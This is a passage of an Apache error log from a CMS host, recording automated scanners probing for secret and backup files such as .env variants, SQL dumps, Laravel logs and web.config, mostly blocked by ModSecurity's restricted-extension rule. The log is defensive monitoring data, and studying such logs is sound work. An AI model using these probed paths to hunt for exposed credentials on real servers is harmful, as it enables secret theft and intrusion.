AH10244: invalid URI path (/assets/front/js/%url%) [Sun Nov 02 10:52:57.964127 2025] [:error] [pid 29504:tid 29566] [client 130.33.73.203:51771] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Tue Nov 04 15:08:14.220351 2025] [:error] [pid 27544:tid 27557] [client 40.113.19.56:11918] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Tue Nov 04 15:08:14.949174 2025] [:error] [pid 27544:tid 27567] [client 40.113.19.56:11918] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Nov 07 10:07:59.754760 2025] [:error] [pid 31683:tid 31704] [client 45.148.10.160:44024] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aQ2o302ZnWL_nleXnQLqYAAAANM"] [Fri Nov 07 10:08:03.443971 2025] [:error] [pid 3825:tid 3845] [client 45.148.10.160:45162] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aQ2o43tgcRRF8A_06jUuIwAAARI"] [Fri Nov 07 10:11:23.396798 2025] [access_compat:error] [pid 3825:tid 3827] [client 45.148.10.160:41848] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Fri Nov 07 10:11:25.109178 2025] [access_compat:error] [pid 3825:tid 3832] [client 45.148.10.160:44844] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Fri Nov 07 10:11:42.827330 2025] [:error] [pid 3825:tid 3835] [client 45.148.10.160:35212] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aQ2pvntgcRRF8A_06jUwPAAAAQg"] [Fri Nov 07 10:11:44.070048 2025] [:error] [pid 31483:tid 31543] [client 45.148.10.160:41674] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aQ2pwI4k4tge9a0pNbTTugAAAAY"] [Wed Nov 12 20:51:30.156429 2025] [:error] [pid 32412:tid 32522] [client 4.217.221.186:11234] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Nov 13 00:37:38.225470 2025] [core:error] [pid 32412:tid 32527] [client 172.192.40.134:19450] Script timed out before returning headers: index.php [Sun Nov 16 22:40:04.025832 2025] [:error] [pid 5863:tid 5900] [client 74.176.64.167:62078] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Nov 17 10:23:56.222588 2025] [access_compat:error] [pid 6876:tid 6888] [client 15.228.221.140:44382] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env.save [Mon Nov 17 10:23:56.223027 2025] [access_compat:error] [pid 28935:tid 29034] [client 15.228.221.140:44412] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Mon Nov 17 10:23:56.223352 2025] [access_compat:error] [pid 6876:tid 6902] [client 15.228.221.140:44424] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env.old [Mon Nov 17 10:23:57.074315 2025] [access_compat:error] [pid 6876:tid 6900] [client 15.228.221.140:44458] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env.bak [Tue Nov 25 17:09:05.727808 2025] [:error] [pid 17579:tid 17600] [client 20.249.10.99:20421] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Tue Nov 25 17:09:12.573101 2025] [:error] [pid 17579:tid 17585] [client 20.249.10.99:20421] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/myip.php [Tue Nov 25 17:10:14.152810 2025] [:error] [pid 17406:tid 17467] [client 20.249.10.99:20461] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Nov 27 08:49:02.789204 2025] [:error] [pid 29600:tid 29618] [client 142.170.89.112:33818] [client 142.170.89.112] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aSf0XjulPxPqHXb29CzVxgAAANA"] [Thu Nov 27 08:49:03.220114 2025] [:error] [pid 29600:tid 29607] [client 142.170.89.112:33834] [client 142.170.89.112] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/logs/access.log"] [unique_id "aSf0XzulPxPqHXb29CzVyAAAAMU"] [Sat Nov 29 22:40:26.997876 2025] [access_compat:error] [pid 14508:tid 14530] [client 15.223.175.142:45540] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Datavase [Sat Nov 29 22:40:33.685167 2025] [:error] [pid 14508:tid 14510] [client 15.223.175.142:46312] [client 15.223.175.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/app.config"] [unique_id "aStaQRkAz8z97Tgu5yentQAAAQA"] [Sat Nov 29 22:40:34.739154 2025] [:error] [pid 14508:tid 14524] [client 15.223.175.142:45540] [client 15.223.175.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.config"] [unique_id "aStaQhkAz8z97Tgu5yentwAAAQ4"] [Sat Nov 29 22:40:48.381788 2025] [:error] [pid 14508:tid 14518] [client 15.223.175.142:46312] [client 15.223.175.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aStaUBkAz8z97Tgu5yenzQAAAQg"] [Sat Nov 29 22:40:49.401512 2025] [:error] [pid 2520:tid 2541] [client 15.223.175.142:41758] [client 15.223.175.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php_error.log"] [unique_id "aStaUaCM5l17Qvzm87xQpgAAAdI"] [Sat Nov 29 22:40:54.815651 2025] [:error] [pid 14508:tid 14531] [client 15.223.175.142:46312] [client 15.223.175.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/web.config"] [unique_id "aStaVhkAz8z97Tgu5yen0gAAARU"] [Sat Nov 29 22:41:05.585023 2025] [:error] [pid 2520:tid 2536] [client 15.223.175.142:41758] [client 15.223.175.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/errors.log"] [unique_id "aStaYaCM5l17Qvzm87xQvAAAAc0"] [Sat Nov 29 22:41:11.037765 2025] [:error] [pid 14508:tid 14528] [client 15.223.175.142:46312] [client 15.223.175.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aStaZxkAz8z97Tgu5yen2gAAARI"] [Sun Nov 30 03:34:46.298529 2025] [:error] [pid 14678:tid 14691] [client 172.190.142.176:14343] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Nov 30 09:44:21.020850 2025] [:error] [pid 21464:tid 21474] [client 158.51.121.183:56466] [client 158.51.121.183] ModSecurity: Access denied with code 403 (phase 2). Found 30 byte(s) in ARGS:_path outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/_fragment"] [unique_id "aSv11Q4578LbG6jHezYfYAAAAQc"] [Mon Dec 01 16:44:36.721435 2025] [:error] [pid 31062:tid 31108] [client 48.210.70.5:53287] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Dec 03 03:22:17.249340 2025] [access_compat:error] [pid 12722:tid 12737] [client 35.183.34.35:36418] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Wed Dec 03 03:22:17.583587 2025] [access_compat:error] [pid 26267:tid 26287] [client 35.183.34.35:36648] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Wed Dec 03 03:22:17.920310 2025] [access_compat:error] [pid 12722:tid 12733] [client 35.183.34.35:36774] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Datavase [Wed Dec 03 03:23:06.211646 2025] [:error] [pid 13040:tid 13062] [client 35.183.34.35:49732] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/backup.sql"] [unique_id "aS-Q-nFBi_x_qNHD--N4pQAAAgk"] [Wed Dec 03 03:23:06.548985 2025] [:error] [pid 13040:tid 13075] [client 35.183.34.35:49928] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aS-Q-nFBi_x_qNHD--N4pgAAAhY"] [Wed Dec 03 03:23:06.884947 2025] [:error] [pid 12722:tid 12733] [client 35.183.34.35:50090] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database.sql"] [unique_id "aS-Q-uYpmpGv-D9ngeOSjAAAAYY"] [Wed Dec 03 03:23:07.219865 2025] [:error] [pid 12722:tid 12730] [client 35.183.34.35:50290] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aS-Q--YpmpGv-D9ngeOSjgAAAYM"] [Wed Dec 03 03:23:09.231868 2025] [:error] [pid 12722:tid 12739] [client 35.183.34.35:50852] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/Thumbs.db"] [unique_id "aS-Q_eYpmpGv-D9ngeOSlgAAAYw"] [Wed Dec 03 03:23:09.574358 2025] [:error] [pid 12618:tid 12661] [client 35.183.34.35:50956] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aS-Q_eynQQy9aZz8wnA65QAAAVY"] [Wed Dec 03 03:23:09.923077 2025] [:error] [pid 12578:tid 12586] [client 35.183.34.35:51088] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ 